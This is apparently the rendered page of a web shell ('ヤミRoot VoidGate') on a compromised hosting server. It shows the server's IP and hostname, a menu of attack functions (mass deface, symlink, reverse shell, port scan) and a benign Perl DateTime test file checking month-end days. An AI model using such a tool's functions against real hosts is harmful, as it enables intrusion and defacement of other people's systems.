ヤミRoot VoidGate
User / IP
:
216.73.216.2
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
.cpanm
/
work
/
1568630761.27314
/
DateTime-1.51
/
t
/
Viewing: 02last-day.t
use strict; use warnings; use Test::Fatal; use Test::More; use DateTime; my @last_day = ( 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 ); my @leap_last_day = @last_day; $leap_last_day[1]++; foreach my $month ( 1 .. 12 ) { my $dt = DateTime->last_day_of_month( year => 2001, month => $month, time_zone => 'UTC', ); is( $dt->year, 2001, 'check year' ); is( $dt->month, $month, 'check month' ); is( $dt->day, $last_day[ $month - 1 ], 'check day' ); } foreach my $month ( 1 .. 12 ) { my $dt = DateTime->last_day_of_month( year => 2004, month => $month, time_zone => 'UTC', ); is( $dt->year, 2004, 'check year' ); is( $dt->month, $month, 'check month' ); is( $dt->day, $leap_last_day[ $month - 1 ], 'check day' ); } { is( exception { DateTime->last_day_of_month( year => 2000, month => 1, nanosecond => 2000 ); }, undef, 'last_day_of_month should accept nanosecond' ); } done_testing();
Coded With 💗 by
0x6ick